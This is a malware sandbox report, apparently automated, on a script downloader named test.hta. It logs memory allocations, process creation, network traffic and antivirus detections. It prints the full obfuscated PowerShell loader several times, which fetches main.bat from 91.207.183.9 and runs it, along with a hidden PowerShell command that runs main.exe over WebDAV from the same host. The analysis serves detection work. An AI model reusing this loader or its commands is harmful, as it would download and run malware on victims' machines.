NtAllocateVirtualMemory Oct. 17, 2023, 10:08 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02727000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:08 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02728000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:08 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02729000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:08 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05030000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:08 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05031000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:08 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05032000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:08 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05033000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:08 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05034000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:08 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05035000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:08 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05036000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:08 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05037000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:08 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05038000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:08 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05039000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:08 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:08 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:08 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:08 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:08 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:08 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:08 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05040000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:08 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05041000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:08 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05042000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:08 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05043000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Roaming\main.bat

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (3 events)

cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function KEPoAX($EfRUfukKc, $GYqeeXtk){[IO.File]::WriteAllBytes($EfRUfukKc, $GYqeeXtk)};function OhkhTpfBZqInCZvmW($EfRUfukKc){if($EfRUfukKc.EndsWith((ajAJbSPVIbAhoypR @(67888,67942,67950,67950))) -eq $True){rundll32.exe $EfRUfukKc }elseif($EfRUfukKc.EndsWith((ajAJbSPVIbAhoypR @(67888,67954,67957,67891))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $EfRUfukKc}elseif($EfRUfukKc.EndsWith((ajAJbSPVIbAhoypR @(67888,67951,67957,67947))) -eq $True){misexec /qn /i $EfRUfukKc}else{Start-Process $EfRUfukKc}};function TBHPplqmTGEcWZ($gcEHEosamOU){$MKNeTksSViYoWh = New-Object (ajAJbSPVIbAhoypR @(67920,67943,67958,67888,67929,67943,67940,67909,67950,67947,67943,67952,67958));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$GYqeeXtk = $MKNeTksSViYoWh.DownloadData($gcEHEosamOU);return $GYqeeXtk};function ajAJbSPVIbAhoypR($otOqVOnyi){$uYdhuBYtOsucbcH=67842;$zVMJBrInhZPv=$Null;foreach($ekRAhOcSGqDyRwp in $otOqVOnyi){$zVMJBrInhZPv+=[char]($ekRAhOcSGqDyRwp-$uYdhuBYtOsucbcH)};return $zVMJBrInhZPv};function KwcENQGqzCexrmkvH(){$eFuIwrNOzJBJS = $env:AppData + '\';$gZwVPv = $eFuIwrNOzJBJS + 'main.bat'; if (Test-Path -Path $gZwVPv){OhkhTpfBZqInCZvmW $gZwVPv;}Else{ $cNQduXeOw = TBHPplqmTGEcWZ (ajAJbSPVIbAhoypR @(67946,67958,67958,67954,67900,67889,67889,67899,67891,67888,67892,67890,67897,67888,67891,67898,67893,67888,67899,67900,67898,67890,67890,67890,67889,67951,67939,67947,67952,67888,67940,67939,67958));KEPoAX $gZwVPv $cNQduXeOw;OhkhTpfBZqInCZvmW $gZwVPv;};;;;}KwcENQGqzCexrmkvH;
cmdline	powershell.exe -ExecutionPolicy UnRestricted function KEPoAX($EfRUfukKc, $GYqeeXtk){[IO.File]::WriteAllBytes($EfRUfukKc, $GYqeeXtk)};function OhkhTpfBZqInCZvmW($EfRUfukKc){if($EfRUfukKc.EndsWith((ajAJbSPVIbAhoypR @(67888,67942,67950,67950))) -eq $True){rundll32.exe $EfRUfukKc }elseif($EfRUfukKc.EndsWith((ajAJbSPVIbAhoypR @(67888,67954,67957,67891))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $EfRUfukKc}elseif($EfRUfukKc.EndsWith((ajAJbSPVIbAhoypR @(67888,67951,67957,67947))) -eq $True){misexec /qn /i $EfRUfukKc}else{Start-Process $EfRUfukKc}};function TBHPplqmTGEcWZ($gcEHEosamOU){$MKNeTksSViYoWh = New-Object (ajAJbSPVIbAhoypR @(67920,67943,67958,67888,67929,67943,67940,67909,67950,67947,67943,67952,67958));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$GYqeeXtk = $MKNeTksSViYoWh.DownloadData($gcEHEosamOU);return $GYqeeXtk};function ajAJbSPVIbAhoypR($otOqVOnyi){$uYdhuBYtOsucbcH=67842;$zVMJBrInhZPv=$Null;foreach($ekRAhOcSGqDyRwp in $otOqVOnyi){$zVMJBrInhZPv+=[char]($ekRAhOcSGqDyRwp-$uYdhuBYtOsucbcH)};return $zVMJBrInhZPv};function KwcENQGqzCexrmkvH(){$eFuIwrNOzJBJS = $env:AppData + '\';$gZwVPv = $eFuIwrNOzJBJS + 'main.bat'; if (Test-Path -Path $gZwVPv){OhkhTpfBZqInCZvmW $gZwVPv;}Else{ $cNQduXeOw = TBHPplqmTGEcWZ (ajAJbSPVIbAhoypR @(67946,67958,67958,67954,67900,67889,67889,67899,67891,67888,67892,67890,67897,67888,67891,67898,67893,67888,67899,67900,67898,67890,67890,67890,67889,67951,67939,67947,67952,67888,67940,67939,67958));KEPoAX $gZwVPv $cNQduXeOw;OhkhTpfBZqInCZvmW $gZwVPv;};;;;}KwcENQGqzCexrmkvH;
cmdline	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -Command \\91.207.183.9@8000\DavWWWRoot\main.exe

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Oct. 17, 2023, 10:08 a.m.	show_type: 0 filepath_r: powershell.exe parameters: -ExecutionPolicy UnRestricted function KEPoAX($EfRUfukKc, $GYqeeXtk){[IO.File]::WriteAllBytes($EfRUfukKc, $GYqeeXtk)};function OhkhTpfBZqInCZvmW($EfRUfukKc){if($EfRUfukKc.EndsWith((ajAJbSPVIbAhoypR @(67888,67942,67950,67950))) -eq $True){rundll32.exe $EfRUfukKc }elseif($EfRUfukKc.EndsWith((ajAJbSPVIbAhoypR @(67888,67954,67957,67891))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $EfRUfukKc}elseif($EfRUfukKc.EndsWith((ajAJbSPVIbAhoypR @(67888,67951,67957,67947))) -eq $True){misexec /qn /i $EfRUfukKc}else{Start-Process $EfRUfukKc}};function TBHPplqmTGEcWZ($gcEHEosamOU){$MKNeTksSViYoWh = New-Object (ajAJbSPVIbAhoypR @(67920,67943,67958,67888,67929,67943,67940,67909,67950,67947,67943,67952,67958));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$GYqeeXtk = $MKNeTksSViYoWh.DownloadData($gcEHEosamOU);return $GYqeeXtk};function ajAJbSPVIbAhoypR($otOqVOnyi){$uYdhuBYtOsucbcH=67842;$zVMJBrInhZPv=$Null;foreach($ekRAhOcSGqDyRwp in $otOqVOnyi){$zVMJBrInhZPv+=[char]($ekRAhOcSGqDyRwp-$uYdhuBYtOsucbcH)};return $zVMJBrInhZPv};function KwcENQGqzCexrmkvH(){$eFuIwrNOzJBJS = $env:AppData + '\';$gZwVPv = $eFuIwrNOzJBJS + 'main.bat'; if (Test-Path -Path $gZwVPv){OhkhTpfBZqInCZvmW $gZwVPv;}Else{ $cNQduXeOw = TBHPplqmTGEcWZ (ajAJbSPVIbAhoypR @(67946,67958,67958,67954,67900,67889,67889,67899,67891,67888,67892,67890,67897,67888,67891,67898,67893,67888,67899,67900,67898,67890,67890,67890,67889,67951,67939,67947,67952,67888,67940,67939,67958));KEPoAX $gZwVPv $cNQduXeOw;OhkhTpfBZqInCZvmW $gZwVPv;};;;;}KwcENQGqzCexrmkvH; filepath: powershell.exe	1	1	0
CreateProcessInternalW Oct. 17, 2023, 10:08 a.m.	thread_identifier: 2916 thread_handle: 0x00000088 process_identifier: 2912 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -Command \\91.207.183.9@8000\DavWWWRoot\main.exe filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1	0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Oct. 17, 2023, 10:08 a.m.	process_identifier: 2560 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x7ef80000 process_handle: 0xffffffff	1	0	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Oct. 17, 2023, 10:08 a.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (2 events)

Data received	HTTP/1.1 200 OK Content-Length: 154 Last-Modified: Fri, 13 Oct 2023 13:17:27 GMT Content-Type: text/plain Date: Tue, 17 Oct 2023 01:09:52 GMT ETag: "5720f861963a7d5332b9171ecdc663c0-1697203047-154" Accept-Ranges: bytes Server: WsgiDAV/4.2.0 Cheroot/9.0.0 Python 3.11.1
Data received	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -Command \\91.207.183.9@8000\DavWWWRoot\main.exe

Poweshell is sending data to a remote host (1 event)

Data sent

GET /main.bat HTTP/1.1 Host: 91.207.183.9:8000 Connection: Keep-Alive

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Oct. 17, 2023, 10:08 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW Oct. 17, 2023, 10:08 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Communicates with host for which no DNS query was performed (1 event)

host

91.207.183.9

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Roaming\main.bat

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
send Oct. 17, 2023, 10:08 a.m.	buffer: GET /main.bat HTTP/1.1 Host: 91.207.183.9:8000 Connection: Keep-Alive socket: 1436 sent: 75	1	75	0

One or more non-whitelisted processes were created (2 events)

parent_process	powershell.exe				martian_process	"C:\Users\test22\AppData\Roaming\main.bat"
parent_process	powershell.exe				martian_process	C:\Users\test22\AppData\Roaming\main.bat

Creates a suspicious Powershell process (4 events)

option	-executionpolicy unrestricted	value	Attempts to bypass execution policy
option	-executionpolicy unrestricted	value	Attempts to bypass execution policy
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-windowstyle hidden	value	Attempts to execute command with a hidden window

The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

File has been identified by 25 AntiVirus engines on VirusTotal as malicious (25 events)

Lionic	Trojan.Script.Generic.4!c
MicroWorld-eScan	VB:Trojan.Valyria.7482
FireEye	VB:Trojan.Valyria.7482
Arcabit	VB:Trojan.Valyria.D1D3A
Symantec	Trojan.Gen.NPE
ESET-NOD32	VBS/Agent.QVR
Avast	Script:SNH-gen [Drp]
Cynet	Malicious (score: 99)
Kaspersky	HEUR:Trojan-Downloader.Script.Generic
BitDefender	VB:Trojan.Valyria.7482
NANO-Antivirus	Trojan.Script.Downloader.jpdglv
Tencent	Script.Trojan-Downloader.Generic.Qsmw
Emsisoft	VB:Trojan.Valyria.7482 (B)
F-Secure	Malware.VBS/Dldr.Agent.VPLT
VIPRE	VB:Trojan.Valyria.7482
Ikarus	Trojan.VBS.Agent
Varist	VBS/Agent.AZC!Eldorado
Avira	VBS/Dldr.Agent.VPLT
GData	VB:Trojan.Valyria.7482
Google	Detected
ALYac	VB:Trojan.Valyria.7482
Rising	Downloader.Agent/VBS!8.10EA5 (TOPIS:E0:RXmrIh5jYAI)
MAX	malware (ai score=84)
Fortinet	VBS/Agent.BSD!tr
AVG	Script:SNH-gen [Drp]

test.hta

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All